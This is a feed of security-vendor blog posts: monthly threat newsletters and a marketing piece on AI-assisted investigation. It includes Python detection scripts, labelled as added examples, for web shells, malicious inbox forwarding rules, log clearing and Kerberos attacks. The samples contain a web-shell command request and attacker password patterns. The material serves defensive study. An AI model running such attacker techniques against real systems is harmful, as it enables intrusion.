This vulnerability occurs when Sitecore improperly handles serialized .NET objects (specifically via ViewState deserialization), allowing maliciously crafted inputs to be deserialized in a way that results in remote code execution (RCE).

Detection Name: (AUTO) Global: Exploit: Deserialization in Sitecore Experience Manager Detected (P3)

Sitecore’s Security Bulletin SC2025-005 — primary vendor guidance with patch and mitigation instructions. Reference: https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003865

Threat Management

SecurityHQ’s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. The following section highlights some key security insights.

Malware Campaign Leveraging Fake PDF Applications

Since November 2025, a widespread malware campaign has been observed targeting organizations through trojanized PDF editor applications. Truesec has identified several malicious programs, most notably ConvertMate, PDFClick, and PDFSkillsApp, that impersonate legitimate PDF utilities while serving as initial access vectors for malware delivery.

These applications are distributed via attacker-controlled domains promoted through online advertisements. Upon installation, the malware executes a multi-stage infection chain, including outbound network communications, host reconnaissance, and persistence mechanisms. Persistence is achieved through scheduled tasks configured to execute at 24-hour intervals. The malware subsequently communicates with hardcoded command-and-control (C2) infrastructure, enabling long-term access and follow-on malicious activity.

Internal Incident Summary:

Our SOC observed a confirmed incident in which Windows Defender for Endpoint detected and blocked the malicious file “UpdateRetreiver.exe” (categorized as ‘Malgent’ malware). The file hash matched Truesec’s published indicators of compromise, confirming that the infection originated from the ConvertMate application installed in the user’s AppData directory. Following established incident response procedures, the affected host was isolated, and remediation steps including system re-installation and credential resets were initiated. As a reminder to all staff: exercise caution when downloading software, particularly free PDF tools advertised online, and always verify applications through official channels before installation.

SecurityHQ Recommendation: Strengthen Third-Party Application Controls

In response to this ongoing threat, SecurityHQ strongly recommends hardening your third-party application usage policy to block or control unauthorized software within your environment. Implementing application control significantly improves your security posture by preventing users from installing potentially malicious utilities. Organizations can leverage Windows AppLocker for on-premises control or Microsoft Defender Cloud Apps Policy for cloud-based management.

Steps to block third-party PDF editors using Cloud Apps policy:

Method 1. Block from Cloud App Catalog

  • In Microsoft Defender Portal, navigate to Cloud Apps → Cloud app catalog
  • Search for the application you want to block (e.g., ConvertMate, PDFClick, and PDFSkillsApp)
  • Click the three dots (⋮) at the end of the app row
  • Select Unsanctioned
  • The app will be automatically synced to Defender for Endpoint and blocked on managed devices

Method 2. Block from Discovered Apps

  • Navigate to Cloud Apps → Cloud Discovery → Discovered apps
  • Review discovered applications and their risk scores
  • Click the app name to view details including users, traffic, and risk factors
  • Click Unsanctioned to block the application
  • Optionally, select Monitored first to track usage before blocking.

Deep Dive Attack Flow

Threat Hunting

SecurityHQ’s Threat Hunting team conducted hunts focused on general account activities seen in the customer’s environment. The following section highlights the hypothesis, hunts and top actions recommended to the customers.

Hypothesis:

Unmanaged or shared endpoints are being used as an entry point to misuse valid credentials, execute unauthorized scripts, establish persistence, and potentially stage or exfiltrate data via removable media or exposed network services.
This hunt assumes that attackers (external or insider) may be living off the land, leveraging legitimate user access, common utilities, and poor endpoint controls rather than deploying overt malware.

Context:

The threat hunt focused on identifying indicators of credential misuse, unauthorized execution, and persistence attempts originating from unmanaged or shared endpoints. Such devices reduce user accountability and increase the likelihood of malicious activity remaining undetected.

The investigation analyzed authentication patterns, network exposure, script execution, download behavior, USB usage, and security control enforcement across the environment. Particular attention was given to behaviors commonly associated with initial access, post-exploitation, lateral movement, and data staging, while avoiding reliance on traditional malware signatures.

The presence of multiple users authenticating from the same endpoint, internet-exposed authentication services, execution of scripts from user-writable directories, and unrestricted file transfer via removable media suggests potential abuse of legitimate credentials and tools. These behaviors collectively align with insider threat scenarios, credential compromise, or early-stage intrusion activity, warranting deeper investigation and control validation.

Threat Hunting Approaches

  • Identity behavior analysis across endpoints: Authentication patterns were reviewed to identify multiple users authenticating from the same device and non-admin users authenticating from an unusually high number of devices, as deviations from normal user-device relationships reduce accountability and increase the risk of credential misuse.
  • Internet-exposed authentication monitoring: Authentication attempts originating directly from the internet were analyzed, including the use of high-risk protocols such as SMB, as externally exposed authentication services significantly increase susceptibility to brute-force attacks and unauthorized access.
  • Script execution from user-controlled locations: Execution of batch and PowerShell scripts from user-writable paths such as Downloads was reviewed, as these locations are frequently abused for reconnaissance, automation, and execution of malicious logic using trusted tools.
  • File download source analysis: Download activity from social media, chat platforms, freeware, cloud storage, generative AI, and foreign-hosted websites was analyzed, as these sources are commonly leveraged for delivery of trojanized tools and untrusted payloads.
  • Removable media usage and file transfers: USB and external storage activity was reviewed to identify frequent connections and file transfers, as removable media remains a common vector for data staging, exfiltration, and malware introduction outside network visibility.
  • Security control interaction analysis: Attack Surface Reduction rule telemetry was analyzed to identify blocked or attempted risky behaviors, as these events often highlight early abuse attempts even when controls successfully prevent execution.

This hunt demonstrates how focusing on user behavior, execution paths, and data movement can uncover meaningful risk that may otherwise remain hidden within normal operational activity.
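Three of the hunts above (shared endpoints, non-admin accounts seen on many devices, and scripts run from user-writable paths) as an added Python example over constructed logon and process telemetry. The record shapes, thresholds and sample values are assumptions, not the hunting team's own queries.

```python
import re
from collections import defaultdict

# Constructed telemetry (sample values). Logons: (user, host, is_admin).
# Process events: (host, user, image path, command line).
LOGONS = [
    ("alice", "KIOSK01", False), ("bob", "KIOSK01", False), ("carol", "KIOSK01", False),
    ("dave", "KIOSK01", False), ("alice", "WS-ALICE", False),
    ("eve", "WS-001", False), ("eve", "WS-002", False), ("eve", "WS-003", False),
    ("eve", "WS-004", False), ("eve", "FS01", False),
    ("itadmin", "WS-001", True), ("itadmin", "WS-002", True), ("itadmin", "FS01", True),
    ("itadmin", "FS02", True), ("itadmin", "DC01", True),
]
PROCESSES = [
    ("KIOSK01", "bob", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell.exe -ep bypass -f "C:\Users\bob\Downloads\inventory.ps1"'),
    ("WS-ALICE", "alice", r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\setup.bat"),
    ("FS01", "itadmin", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -f C:\Scripts\backup.ps1"),
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# A script file under a per-user, user-writable directory.
USER_PATH = re.compile(
    r"C:\\Users\\[^\\]+\\(Downloads|AppData|Desktop)\\.*\.(ps1|bat|cmd|vbs|js)\b", re.I)


def shared_endpoints(logons, min_users=3):
    """Hosts on which at least `min_users` distinct accounts logged on."""
    users = defaultdict(set)
    for user, host, _ in logons:
        users[host].add(user)
    return {h: sorted(u) for h, u in users.items() if len(u) >= min_users}


def roaming_non_admins(logons, min_hosts=4):
    """Non-admin accounts seen on an unusually high number of hosts; admins are
    excluded because broad device coverage is expected for them."""
    hosts = defaultdict(set)
    for user, host, is_admin in logons:
        if not is_admin:
            hosts[user].add(host)
    return {u: sorted(h) for u, h in hosts.items() if len(h) >= min_hosts}


def scripts_from_user_paths(processes):
    """Script hosts launched with a script that lives under a user-writable path."""
    hits = []
    for host, user, image, cmdline in processes:
        exe = image.rsplit("\\", 1)[-1].lower()
        match = USER_PATH.search(cmdline)
        if exe in SCRIPT_HOSTS and match:
            hits.append({"host": host, "user": user, "script": match.group(0)})
    return hits


if __name__ == "__main__":
    print(shared_endpoints(LOGONS))
    print(roaming_non_admins(LOGONS))
    print(scripts_from_user_paths(PROCESSES))
```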

Recommendations: Based on the observed threat landscape, the following actions are recommended:

  • Enforce conditional and device-based access controls to limit authentication from unmanaged or shared endpoints.
  • Restrict script execution from user-writable directories and apply tighter PowerShell policies for non-admin users.
  • Eliminate or tightly control internet-exposed authentication services, especially SMB.
  • Strengthen controls and monitoring around removable media usage and bulk file transfers.
  • Use ASR rule hits as proactive hunting signals rather than relying solely on alert severity.

Incident Response – Success Story

Targeted Intrusion Campaign Against Indian Financial Sector

Overview

We are monitoring a targeted cyber intrusion campaign affecting organizations in India’s Financial Services sector. The activity demonstrates advanced, manual attacker behavior and sustained access rather than opportunistic or automated attacks.

Based on observed behavior, the campaign is assessed with moderate confidence to align with China-nexus state-linked threat activity, consistent with tradecraft previously associated with APT41.


What Happened

Attackers gained access by exploiting vulnerable internet-facing web applications, primarily hosted on Microsoft IIS servers. Once inside, they established persistent, stealthy access and moved laterally across server environments.

The attackers avoided traditional malware and instead relied on legitimate system tools and commercial cloud infrastructure, allowing their activity to blend into normal operations and evade basic security controls.

Why This Matters

  • High-risk sector targeting: Financial services are being deliberately selected, indicating strategic rather than criminal objectives.
  • Stealth and persistence: The attackers prioritize long-term access, limiting detection and increasing potential business impact.
  • Elevated access: Compromised systems often resulted in administrator-level control, increasing the risk of widespread disruption or data exposure.
  • Unclear intent: No evidence of ransomware, extortion, or data leaks has been observed, suggesting intelligence gathering or strategic positioning.

Key Observations

  • Use of compromised web servers as an entry point and long-term foothold
  • Creation of unauthorized administrator accounts and deliberate log deletion
  • Controlled movement between internal servers, avoiding noisy or indiscriminate spread
  • Use of trusted cloud platforms (e.g., AWS, DigitalOcean) for command-and-control, complicating detection

Interesting Fact: Newly created administrator accounts followed recognizable password patterns (e.g., F*#k@admin798, Adminf*#k@782). Log clearing was consistently observed immediately after account creation, indicating active defense evasion.

Threat Actor Attribution (Assessment):

Based on the cumulative TTPs observed, this activity is assessed with moderate confidence to be associated with China-nexus advanced persistent threat operations, closely aligning with tradecraft attributed to APT41.

Attribution Rationale:

  • Webshell-driven persistence on IIS servers
  • Heavy reliance on LOLBins over custom malware
  • Controlled lateral movement using Admin$ and SQL Server
  • Credential dumping and local admin account creation
  • Masquerading of binaries and log clearing
  • Abuse of mainstream cloud infrastructure for C2

The attacker’s motive remains unclear, as no evidence of data encryption, extortion demands, data leakage, or underground forum disclosures has been observed to date.

Recommended Actions:

  • Prioritize patching and security hardening of all internet-facing applications
  • Ensure least-privilege access for web and application services
  • Mandate centralized logging and monitoring, including alerts for log deletion
  • Review administrative access controls, including local admin accounts and server-to-server access
  • Limit outbound server connectivity to approved business destinations only
  • Confirm incident response readiness, including executive escalation procedures
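An added example (not part of the original post) of the log-deletion alerting recommended above, applied to the observed sequence of account creation immediately followed by log clearing: correlating Windows Security events 4720, 4732 and 1102 per host. The event records are constructed samples with simplified field names.

```python
from datetime import datetime, timedelta

# Constructed Windows Security event records with simplified field names
# (a SIEM export would be mapped into this shape); hosts and names are samples.
# 4720 = user account created, 4732 = member added to local group,
# 1102 = audit log cleared.
EVENTS = [
    {"time": "2026-01-20T02:11:05", "host": "WEB01", "id": 4720,
     "target": "svc_backup", "subject": "IIS APPPOOL\\Site"},
    {"time": "2026-01-20T02:11:09", "host": "WEB01", "id": 4732,
     "target": "svc_backup", "group": "Administrators", "subject": "IIS APPPOOL\\Site"},
    {"time": "2026-01-20T02:12:40", "host": "WEB01", "id": 1102, "subject": "svc_backup"},
    {"time": "2026-01-20T09:30:00", "host": "FS02", "id": 4720,
     "target": "newhire", "subject": "DOMAIN\\helpdesk"},
    {"time": "2026-01-20T16:00:00", "host": "FS02", "id": 1102, "subject": "DOMAIN\\admin"},
]


def correlate_admin_then_clear(events, window=timedelta(minutes=15)):
    """Per host, pair each account creation (4720) with the first log clear (1102)
    inside `window`, noting whether the new account was also added to the local
    Administrators group (4732) in between. Returns one finding per pair."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        by_host.setdefault(ev["host"], []).append(ev)
    findings = []
    for host, evs in by_host.items():
        for i, ev in enumerate(evs):
            if ev["id"] != 4720:
                continue
            t0 = datetime.fromisoformat(ev["time"])
            made_admin = False
            for later in evs[i + 1:]:
                t1 = datetime.fromisoformat(later["time"])
                if t1 - t0 > window:
                    break  # events are time-sorted, so nothing later can qualify
                if (later["id"] == 4732 and later.get("target") == ev["target"]
                        and later.get("group") == "Administrators"):
                    made_admin = True
                if later["id"] == 1102:
                    findings.append({"host": host, "account": ev["target"],
                                     "created_by": ev["subject"], "made_admin": made_admin,
                                     "seconds_to_clear": int((t1 - t0).total_seconds())})
                    break
    return findings


if __name__ == "__main__":
    for f in correlate_admin_then_clear(EVENTS):
        print(f)
```

The helpdesk-created account on FS02 is not flagged at the default window because the log clear came hours later; widen the window only if the environment's normal admin activity makes that acceptable.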


How AI Brings Clarity to SOCs: Inside IDC’s Recognition of SecurityHQ’s Approach to MDR https://www.securityhq.com/blog/ai-driven-security-investigation-idc-recognition/ Wed, 04 Feb 2026 08:41:02 +0000

The post How AI Brings Clarity to SOCs: Inside IDC’s Recognition of SecurityHQ’s Approach to MDR  appeared first on SecurityHQ.

Introduction

SecurityHQ has been named a Leader for the second consecutive year in the IDC MarketScape: Middle East Managed Detection and Response 2025 Vendor Assessment. IDC’s MarketScape evaluations assess providers across service delivery, operational maturity, and technology strategy. This recognition highlights how AI driven security investigation is enabling SOCs to move from raw detection to clearer, outcome-focused response. It reflects SecurityHQ’s commitment to delivering outcomes, not just coverage.

A key focus of IDC’s 2025 assessment was evaluating AI applications, examining not just adoption but how effectively it addresses core SOC challenges.

SecurityHQ’s differentiation is rooted in an understanding of what SOCs actually need: not more tools or more detections, but more clarity. While many vendors focus AI capabilities on detection, increasing the volume and sophistication of threat identification, this approach assumes the primary challenge is visibility.

This is where AI driven security investigation becomes critical, shifting focus from alert volume to contextual understanding and decision support. 

SecurityHQ’s approach addresses the actual limiting factor in SOC performance, the ability to transform fragmented signals into clear, actionable intelligence. SecurityHQ operationalises this approach through SHQ Autopilot. Rather than sending analysts isolated alerts to correlate manually, the platform assembles related activity across environments into centralized, contextualised insight.

IDC’s assessment captured this distinction, highlighting that SecurityHQ’s emphasis on investigation clarity produces the outcomes security leaders care about: faster incident resolution, more defensible decisions, sustainable operations, not just broader visibility or more sophisticated detection for its own sake.

Why Investigation Breaks in Modern SOCs 

Security Operations Centers have expanded significantly in size, tooling, and coverage. Yet threats continue to bypass defences. Industry research consistently points to a gap between detection and action, where teams struggle to investigate alerts quickly enough to contain real threats. 

As environments grow across endpoints, networks, cloud platforms, identities, and applications, analysts are required to manually connect fragmented signals under constant time pressure. This slows investigations, introduces inconsistency, and creates opportunities for attackers to evade response. 

In many SOCs, analysts still review alerts one by one, determine relevance, and piece together activity across multiple tools. While this can work at smaller scales, it becomes difficult to sustain in high-volume environments generating thousands of alerts each day. 

AI has been widely adopted to improve detection, but increased alert volume alone does not solve investigation challenges. In many cases, it exacerbates them.   

Leveraging AI for Decision Clarity

What security teams need is not more alerts, but clearer context. Analysts need to understand which signals are related, how activity has unfolded over time, and whether a situation actually warrants response.

By connecting signals across time and environments, AI driven security investigation helps analysts understand how activity unfolds and whether it genuinely warrants response.

When telemetry from different security controls is analysed in isolation, that clarity is hard to achieve. When it is brought together and examined as a whole, investigation can shift from alert handling to behaviour-based understanding. 

Machine learning helps establish baselines and surface anomalies across time-series data. Large language models can then assemble related activity into readable investigative summaries, making it easier for analysts to understand what is happening and why it matters. 

“Modern SOCs don’t fail because they lack tools, they fail because they lack clarity. AI changes the investigation model by reducing noise, connecting activity across the environment, and allowing analysts to focus on threats that genuinely matter. When applied correctly, it becomes a force multiplier for both speed and decision quality,” said Aaron Hambleton, SVP MEA. 

SHQ Autopilot

SHQ Autopilot brings AI driven security investigation into daily SOC operations by correlating activity and assembling incidents as clear investigative narratives.

SHQ Autopilot uses AI and automation to qualify alerts, correlate related activity across users, hosts, IP addresses, and cloud resources, and assemble incidents as clear investigative narratives. Instead of presenting analysts with disconnected alerts, it provides a structured view of what happened, how activity progressed, and which assets or identities are involved. 

By embedding investigation logic directly into workflows, SHQ Autopilot reduces manual correlation and repetitive analysis. This supports earlier identification of multi-stage attacks and more consistent incident qualification, particularly in high-volume environments. 

Investigation outputs then flow directly into response. Context, enrichment, and mitigation guidance are attached to incidents, enabling automated containment actions where confidence thresholds are met. Where human judgement is required, analysts are supported with clearer information and recommended next steps. 

This allows analysts to focus on validation, decision making, and oversight, rather than reconstructing events across multiple tools.

What IDC Recognised

In its assessment, IDC highlighted SecurityHQ’s ability to consolidate telemetry across SIEM, EDR, NDR, and cloud sources through the SHQ Response platform, supported by a data fabric aligned to Open Cybersecurity Schema Framework standards. 

IDC also noted the role of SHQ Autopilot in generating contextualised incident storylines, applying workflow automation, and supporting investigation and triage, alongside ContainX for enabling automated containment actions. 

Together, these capabilities reflect an approach that prioritises investigation clarity, consistency, and expert-led response at scale. 

While AI and automation reduce friction and speed up workflows, experienced analysts remain essential for interpreting complex scenarios, applying business context, and overseeing response decisions. 

This balance allows SecurityHQ to scale operations without sacrificing transparency or control.

Conclusion

SecurityHQ’s recognition as an IDC MarketScape Leader reflects the strength of its MDR offering across multiple dimensions, including how investigation and response are handled in practice. As security environments continue to grow in scale and complexity, the ability to move from fragmented alerts to clear, defensible decisions becomes increasingly important. 

IDC’s assessment reinforces the value of approaches that prioritise investigation clarity, contextual understanding, and expert-led response. SecurityHQ’s continued recognition underscores its focus on producing measurable outcomes for its clients by enabling them with greater speed, clarity, and confidence in the face of evolving threats.


Managed Defense Threat Insights: December 2025 Newsletter https://www.securityhq.com/blog/managed-defense-threat-insights-december-2025-newsletter/ Mon, 05 Jan 2026 10:49:53 +0000

The post Managed Defense Threat Insights: December 2025 Newsletter appeared first on SecurityHQ.

Cyber Defense Center

Threat Actors Leveraging Phishing to Compromise User Mailbox and Abuse Inbox Rules

Detection: SecurityHQ’s SOC detected suspicious email activity associated with a user account, including abnormal inbox rule creation and unusual outbound email patterns, through Microsoft Defender for Office 365 alerts and message tracking log analysis.

Description: SOC identified a phishing incident where a user’s credentials were compromised after interacting with a malicious phishing email. Following successful account compromise, the threat actor authenticated to the user’s mailbox and created a malicious inbox rule that automatically forwarded incoming emails to an external RSS feed email address and marked those emails as read, effectively hiding attacker activity and exfiltrating sensitive communications.

Further investigation revealed that the compromised user account was subsequently used to send internal phishing emails to multiple employees within the organization, leveraging the trust associated with a legitimate internal sender. As a result, several additional user accounts were exposed and partially compromised before containment actions were initiated. Lead Incident Responder reviewed audit logs, inbox rule configurations, sign-in activity, and email telemetry to confirm the scope of compromise and identify affected users.

Immediate response actions included disabling the compromised account, resetting credentials, removing malicious inbox rules, revoking active sessions, and blocking the external forwarding destination. All affected users were notified, and suspicious internal phishing emails were removed from mailboxes using Defender remediation actions.

Lessons Learnt: User phishing remains a highly effective initial access vector for attackers. Inbox rule abuse is a common technique used to maintain persistence and evade detection. Rapid detection, user education, and automated remediation capabilities are critical to minimizing the blast radius of phishing-based compromises.

A SecurityHQ blog published in 2021 describes the same tactic used in this compromise and is still relevant today. Refer: Read the blog
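An added Python example, not from the original post, that triages inbox-rule audit records for the pattern described above (forwarding to an external address combined with marking the messages as read). The records are constructed samples, and INTERNAL_DOMAINS is an assumed list of the organisation's own mail domains.

```python
import json

INTERNAL_DOMAINS = {"example.com"}  # assumption: the organisation's own mail domains

# Constructed audit records in the shape Exchange admin-audit entries use for
# cmdlet arguments (a Parameters list of Name/Value pairs); all values are samples.
RECORDS = [
    json.dumps({"Operation": "New-InboxRule", "UserId": "jdoe@example.com",
                "ClientIP": "198.51.100.33", "Parameters": [
                    {"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "inbox@rssfeed-example.net"},
                    {"Name": "MarkAsRead", "Value": "True"}]}),
    json.dumps({"Operation": "Set-InboxRule", "UserId": "asmith@example.com",
                "ClientIP": "203.0.113.5", "Parameters": [
                    {"Name": "Identity", "Value": "Newsletters"},
                    {"Name": "MoveToFolder", "Value": "Archive"}]}),
    json.dumps({"Operation": "New-InboxRule", "UserId": "bwong@example.com",
                "ClientIP": "203.0.113.8", "Parameters": [
                    {"Name": "Name", "Value": "To manager"},
                    {"Name": "ForwardTo", "Value": "manager@example.com"}]}),
]

FORWARD_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"}
HIDE_PARAMS = {"MarkAsRead", "DeleteMessage", "MoveToFolder"}


def params(rec):
    """Flatten the Name/Value parameter list into a dict."""
    return {p["Name"]: p["Value"] for p in rec.get("Parameters", [])}


def is_external(address):
    return address.split("@")[-1].strip().lower() not in INTERNAL_DOMAINS


def score_inbox_rule(rec):
    """Score one rule creation/modification: external forwarding counts 2,
    a hide action (mark read / delete / move) counts 1, and a blank or
    single-character rule name counts 1, so 3 or more is high risk."""
    if rec.get("Operation") not in {"New-InboxRule", "Set-InboxRule"}:
        return 0, []
    p = params(rec)
    score, reasons = 0, []
    for name in sorted(FORWARD_PARAMS & p.keys()):
        targets = [a.strip() for a in p[name].split(",")]
        if any(is_external(a) for a in targets):
            score += 2
            reasons.append(f"{name} to external address {p[name]}")
    hide = sorted(HIDE_PARAMS & p.keys())
    if hide:
        score += 1
        reasons.append("hides messages via " + ", ".join(hide))
    if "Name" in p and len(p["Name"].strip()) <= 1:
        score += 1
        reasons.append("blank or single-character rule name")
    return score, reasons


def triage(lines, threshold=3):
    """Return the records scoring at or above `threshold`, with their reasons."""
    out = []
    for line in lines:
        rec = json.loads(line)
        score, reasons = score_inbox_rule(rec)
        if score >= threshold:
            out.append({"user": rec["UserId"], "ip": rec["ClientIP"],
                        "score": score, "reasons": reasons})
    return out


if __name__ == "__main__":
    for hit in triage(RECORDS):
        print(hit)
```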

Threat Actors Exploiting weakness in ASP.NET viewstate deserialization to Remote Code Execution

Detection: Client reported possible malicious activity due to the presence of web shells on an IIS-hosted web server.

Description: The client reported the possible presence of a web shell on a web server. The team initiated an investigation using the available IIS server access logs and requested access to the client’s Microsoft Defender console. Based on log analysis, the team confirmed that the initial attack vector was an ASP.NET ViewState deserialization vulnerability. The team identified all malicious web shell payloads and the source IP addresses from which they were deployed. Immediate mitigation steps were recommended, including removing write permissions from the utilities folder. The team also provided all identified Indicators of Compromise (IOCs) to be blocked via the Defender console.

Recommendations: To strengthen the overall security posture, the team recommended applying the patch for the ViewState vulnerability. The team provided all available Indicators of Compromise (hashes) to be blocked in Microsoft Defender and also shared detection criteria for identifying similar instances, recommending the creation of a custom detection rule in Defender.

Lessons Learnt: Organizations should patch zero-day critical vulnerabilities immediately. IIS web servers hosting public applications are attractive targets for attackers. Continuous monitoring and hardening of these assets are essential. Enforcing least-privilege access (e.g., restricting write access to application folders) can significantly reduce attacker capabilities.

A similar incident was featured in our November 2025 newsletter edition, which underlines how critical this vulnerability is and why it needs immediate patching. Refer: Read the blog
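The log review described above, where IIS access logs were used to confirm the ViewState vector and identify the web shells and the addresses that deployed them, can be scripted. The following is an added worked example, not SecurityHQ's tooling: it parses W3C-format IIS log lines (a constructed sample, with the column layout taken from the `#Fields:` header), flags any successfully served script path that is not in a baseline of known application pages, and pairs each one with the most recent POST from the same client, which is the likely deployment request (a forged ViewState payload posted to a legitimate page). The baseline set and the ten-minute pairing window are assumptions.

```python
"""Hunt for web-shell deployment in IIS W3C access logs.

Added example (not SecurityHQ code). Assumptions: W3C format with a
'#Fields:' header, a baseline set of legitimate script paths, and that a
shell is dropped via a POST to an existing page (for example a forged
ViewState payload) and then requested with GET by the same client.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SCRIPT_EXTENSIONS = (".aspx", ".ashx", ".asmx", ".asp")

# Constructed sample log, not a real capture.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2025-12-01 09:00:01 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.7 Mozilla/5.0 200 0 0 120
2025-12-01 09:00:03 10.0.0.5 POST /Default.aspx - 443 - 198.51.100.7 Mozilla/5.0 500 0 0 890
2025-12-01 09:00:09 10.0.0.5 GET /utilities/health.aspx cmd=whoami 443 - 198.51.100.7 python-requests/2.31 200 0 0 45
2025-12-01 09:05:00 10.0.0.5 GET /Default.aspx - 443 - 203.0.113.9 Mozilla/5.0 200 0 0 100
2025-12-01 09:06:00 10.0.0.5 GET /About.aspx - 443 - 203.0.113.9 Mozilla/5.0 200 0 0 80
2025-12-01 09:07:00 10.0.0.5 GET /missing.aspx - 443 - 203.0.113.9 Mozilla/5.0 404 0 2 5
"""

# Script paths the application is known to serve (assumed baseline).
BASELINE_PATHS = {"/Default.aspx", "/About.aspx"}


def parse_w3c(text):
    """Yield dict records, using the '#Fields:' header for column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # skip malformed lines rather than guess at columns
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        yield rec


def find_webshell_candidates(text, baseline, window=timedelta(minutes=10)):
    """First successful hit on each script path outside the baseline, paired
    with the nearest earlier POST from the same client inside `window`."""
    records = sorted(parse_w3c(text), key=lambda r: r["ts"])
    posts_by_client = defaultdict(list)
    first_seen = {}
    for rec in records:
        if rec["cs-method"] == "POST":
            posts_by_client[rec["c-ip"]].append(rec)
        path = rec["cs-uri-stem"]
        if (path.lower().endswith(SCRIPT_EXTENSIONS) and path not in baseline
                and rec["sc-status"].startswith("2") and path not in first_seen):
            first_seen[path] = rec
    findings = []
    for path, hit in first_seen.items():
        earlier = [p for p in posts_by_client[hit["c-ip"]]
                   if hit["ts"] - window <= p["ts"] <= hit["ts"]]
        deploy = earlier[-1] if earlier else None  # most recent POST = likely deployment request
        findings.append({
            "path": path,
            "client": hit["c-ip"],
            "first_seen": hit["ts"].isoformat(),
            "query": hit["cs-uri-query"],
            "deploy_post": deploy["cs-uri-stem"] if deploy else None,
            "deploy_status": deploy["sc-status"] if deploy else None,
        })
    return findings


if __name__ == "__main__":
    for finding in find_webshell_candidates(SAMPLE_LOG, BASELINE_PATHS):
        print(finding)
```

On the sample, the only finding is `/utilities/health.aspx`, first requested with `cmd=whoami` from 198.51.100.7 six seconds after that client's POST to `/Default.aspx` returned a 500; the 404 for `/missing.aspx` is ignored because the shell was never served. In practice, the baseline comes from a deployment manifest or from paths seen before the suspected compromise window, and `cs-bytes` logging should be enabled so oversized ViewState POSTs can be flagged directly.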

Threat Detection Engineering

Key Detection Engineering Highlights for December

A Global Penetration Testing Season Observed by SecurityHQ (Nov–Dec 2025)

As the year drew to a close, SecurityHQ’s global SOC entered one of its busiest periods. From November through December 2025, organizations across North America, EMEA, APAC, and LATAM scheduled year-end penetration testing and red team exercises to validate their security posture before the new fiscal year.

Early Reconnaissance: Mapping the Identity Landscape

In multiple customer environments, pentesters began quietly. Using LDAP queries, they enumerated Active Directory structures, probing for accounts with Kerberos pre-authentication disabled, a classic foothold for later abuse. SecurityHQ analysts noticed a surge in read-heavy directory queries, far exceeding normal user behavior baselines.

Soon after, the focus shifted to high-value groups. Enumerations of Domain Admins and Enterprise Admins were performed repeatedly, sometimes using native Windows tools, other times via popular AD enumeration frameworks. In mature environments, these queries triggered decoy account interactions, immediately flagging malicious intent.

In parallel, pen testers ran discovery scans, sweeping well-known ports for Windows services that can pave the way for lateral movement. In several cases, testers attempted DNS zone transfer requests, hoping to extract internal naming conventions and asset inventories.

Credential Access: Testing Human Weakness

The activity continued with password spray attacks. Pentesters tested commonly used passwords across large user populations, carefully staying below lockout thresholds.

SecurityHQ’s behavioral analytics detected the low-and-slow authentication failures and correlated them with earlier enumeration activity, forming a complete attack narrative.

Privilege Escalation Attempts: Ticket-Based Attacks

As reconnaissance matured, pentesters escalated to Kerberos abuse techniques.
SecurityHQ telemetry showed:

  • Kerberoasting attempts, where service accounts with SPNs were targeted for offline password cracking.
  • AS-REP Roasting, leveraging accounts with disabled pre-authentication to request encrypted authentication material.

These activities stood out due to abnormal Kerberos ticket request patterns.

Logical Phase          | Pentester Activity                                  | SecurityHQ Use Case Coverage
Network Discovery      | Discovery scans for open services/ports             | ✔ Covered
Network Discovery      | Zone transfer request                               | ✔ Covered
Directory Recon        | AD/DC enumeration using LDAP queries                | ✔ Covered
Directory Recon        | Excessive domain object queries                     | ✔ Covered
Directory Recon        | Default admin group enumeration                     | ✔ Covered
Target Identification  | Identify accounts with pre-authentication disabled  | ✔ Covered
Target Identification  | Decoy account enumeration                           | ✔ Covered
Credential Access      | AS-REP Roasting                                     | ✔ Covered
Credential Access      | Kerberoasting                                       | ✔ Covered
Authentication Abuse   | Password spray                                      | ✔ Covered

LDAP AS-REP Roasting

Any AD account may suddenly produce a burst of logon events against Active Directory. Usually the source is a tool or script that rapidly queries directory information, attempting to identify privileged roles, access paths and high-value accounts. The account's credentials are typically hard-coded or embedded in the tool or script being used.

SecurityHQ's Threat Detection team has developed logic that uses the Active Directory Directory Service event log (LDAP activity) on domain controllers, stored under C:\Windows\System32\winevt\Logs.

Rule Name: Authentication: Windows – Possible LDAP AS-REP Roasting

Detection Scope: Monitors LDAP and Kerberos authentication activity across Active Directory domain controllers.

Why it matters: AS-REP responses for accounts that do not require pre-authentication can be captured and cracked offline, potentially yielding a password without generating repeated logon failures. Early detection of this behavior helps identify credential access attempts before attackers escalate privileges or move laterally.

MITRE ATT&CK Mapping

TA0006 – Credential Access

T1558.004 – Steal or Forge Kerberos Tickets: AS-REP Roasting.

Capabilities that were once exclusive to identity protection tools are now detectable by SecurityHQ through direct analysis of LDAP logs, eliminating the need to rely on EDR or identity telemetry.
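The Kerberos and password-spray activity described in the pentest-season narrative above, and the AS-REP Roasting rule, as an added worked example rather than SecurityHQ's rule logic. It runs three detections over constructed Windows Security events, reduced to the EventData fields the rules need: AS-REP Roasting (4768 with PreAuthType 0 and an RC4 ticket), Kerberoasting (one account requesting RC4 service tickets for many distinct SPNs in a short window) and password spraying (one source failing against many distinct accounts while staying under lockout), then correlates the sources into the single "attack narrative" the text mentions. The thresholds and windows are assumptions to tune against your own baseline.

```python
"""Detections for AS-REP Roasting, Kerberoasting and password spraying
over Windows Security events 4768, 4769 and 4625.

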